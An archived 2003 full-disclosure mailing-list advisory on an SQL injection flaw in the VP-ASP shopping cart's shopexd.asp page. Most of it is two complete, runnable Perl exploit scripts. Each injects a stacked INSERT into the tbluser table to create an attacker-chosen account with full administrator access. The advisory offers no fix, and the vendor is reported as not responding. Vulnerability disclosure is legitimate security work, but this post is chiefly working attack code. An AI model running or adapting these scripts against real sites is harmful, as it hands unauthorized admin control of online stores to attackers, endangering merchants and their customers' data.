VPASP SQL Injection Vulnerability & Exploit CODE

From: aresuat_private
Date: Thu Jul 03 2003 - 21:15:21 PDT

Next message: Delfim Machado: "[Full-Disclosure] MacOSX - crash screensaver locked with password and get the desktop back"

Previous message: Bosen: "Another ProductCart SQL Injection Vulnerability"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Advisory Name: VPASP SQL Injection Vulnerability & Exploit CODE
Release Date: 05/07/2003
Application: 5
Platform: Win32/MSSQL
Severity: High
BUG Type: SQL Injection
Discover by: AresU <aresuat_private> & TioEuy <tioeuyat_private>
Author: Bosen <mobileat_private>
Vendor Status: See below.
Vendor URL: http://www.vpasp.com/
Reference: http://bosen.net/releases/

Overview:
VP-ASP is  now in use in over 70 countries and has every major feature
you would expect from an e-commerce solution. VP-ASP combines  ease of use
and powerful features with unlimited customization.
more nice reading at http://www.vpasp.com itself.

Details:
Looking at vpasp source code, we found nice SQL Injection vuln. which is
lies on shopexd.asp. Exploiting is not hard to do. Insert new user with
admin priviledge can be done in a sec. Which is would couse full control to
web based admin interface.

Exploits/POC:
by Bosen
--------
#!/usr/bin/perl -w
$pamer = "
1ndonesian Security Team (1st)
==============================
tio-fux.pl, vpasp SQL Injection Proof of Concept
Exploit by  : Bosen & TioEuy
Discover by : TioEuy, AresU
Greetz to   : AresU, syzwz (ta for da ipod), TioEuy, sakitjiwa,
muthafuka all #hackers\@centrin.net.id/austnet.org
http://bosen.net/releases/
"; # shut up ! we're the best in our country :)

use LWP::UserAgent;  # LWP Mode sorry im lazy :)
use HTTP::Request;
use HTTP::Response;
$| = 1;
print $pamer;
if ($#ARGV<3){
  print "\n Usage: perl tio-fux.pl <uri> <prod-id> <user> <password>
\n\n";
  exit;
}
my $biji    =
"1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,
29";
$tio     = "$ARGV[0]/shopexd.asp?id=$ARGV[1]";
$tio    .= ";insert into tbluser
(\"fldusername\",\"fldpassword\",\"fldaccess\") ";
$tio    .= "values ('$ARGV[2]','$ARGV[3]','$biji')--";

my $bosen  = LWP::UserAgent->new();
my $gembel = HTTP::Request->new(GET => $tio);
my $dodol  = $bosen->request($gembel);
if ($dodol->is_error()) {
   printf " %s\n", $dodol->status_line;
} else {
   print "Tuing !\n";
}
print "\n680165\n";
--END--

by Aresu
--------
#!/usr/bin/perl
# PRIVATE***PRIVATE***PRIVATE***PRIVATE***PRIVATE***PRIVATE***PRIVATE
# 1ndonesian Security Team (1st)
# ==============================
# VP-ASP Shopping Cart - Exploit
# Discover by : TioEuy & AresU;
# Greetz to: syzwz (ta for da ipod), Bosen, sakitjiwa, muthafuka all
# hackersat_private/austnet.org, #romanceat_private
# http://bosen.net/releases/
use Socket;

$dodolbasik = "tioeuy.pl, VPASP exploit by TioEuy&AresU ";
$aksesnya
="1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
,29";
$pieldnya = '"fldusername","fldpassword","fldaccess"';

if ($#ARGV<4)
{
  print "\n$dodolbasik";
  print "\n\n Usage: perl tioeuy.pl <server> <full path> <id> <user>
<password> \n\n";
  exit;
}
$kupret="$ARGV[1]shopexd.asp?id=$ARGV[2];insert into tbluser
($pieldnya)
values ('$ARGV[3]','$ARGV[4]','$aksesnya')--";
$kupret=~s/\ /%20/g;
$kupret="GET $kupret HTTP/1.0\r\nHost: $ARGV[0]\r\n\r\n";
print $kupret;

$port=80;
$host=$ARGV[0];
$target = inet_aton($host);
@hasil=sendraw($kupret);
print $gembel;
print @hasil;

# ------------- Sendraw - thanx RFP rfpat_private
sub sendraw {   # this saves the whole transaction anyway
        my ($pstr)=@_;

        socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
                die("Socket problems\n");

        if(connect(S,pack "SnA4x8",2,$port,$target)){
                my @in;
                select(S);      $|=1;   print $pstr;
                while(<S>){ push @in, $_;}
                select(STDOUT); close(S); return @in;
        }
}
--END--

Vendor Response:
Contacted. No response.

Recommendation:
No recommendation for this.

1ndonesian Security Team (1st) Advisory:
http://bosen.net/releases/

About 1ndonesian Security Team:
1ndonesian Security Team, research and develop intelligent, advanced
application security assessment. Based in Indonesia, 1ndonesian Security
Team offers best of breed security consulting services, specialising in
application, host and network security assessments.

1st provides security information and patches for use by the entire 1st
community.

This information is provided freely to all interested parties and may be
redistributed provided that it is not altered in any way, 1st is
appropriately
credited and the document retains.

Greetz to:
Bosen, sakitjiwa, muthafuka, alphacentury, Gembul, syzwz, Heltz, TomIngShUu,
riico, w4n, negative
All 1ndonesian Security Team - #hackersat_private/centrin.net.id

AresU <aresuat_private>
======================
Original document can be fount at http://www.bosen.net/releases/?id=41

Next message: Delfim Machado: "[Full-Disclosure] MacOSX - crash screensaver locked with password and get the desktop back"
Previous message: Bosen: "Another ProductCart SQL Injection Vulnerability"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Jul 04 2003 - 08:28:11 PDT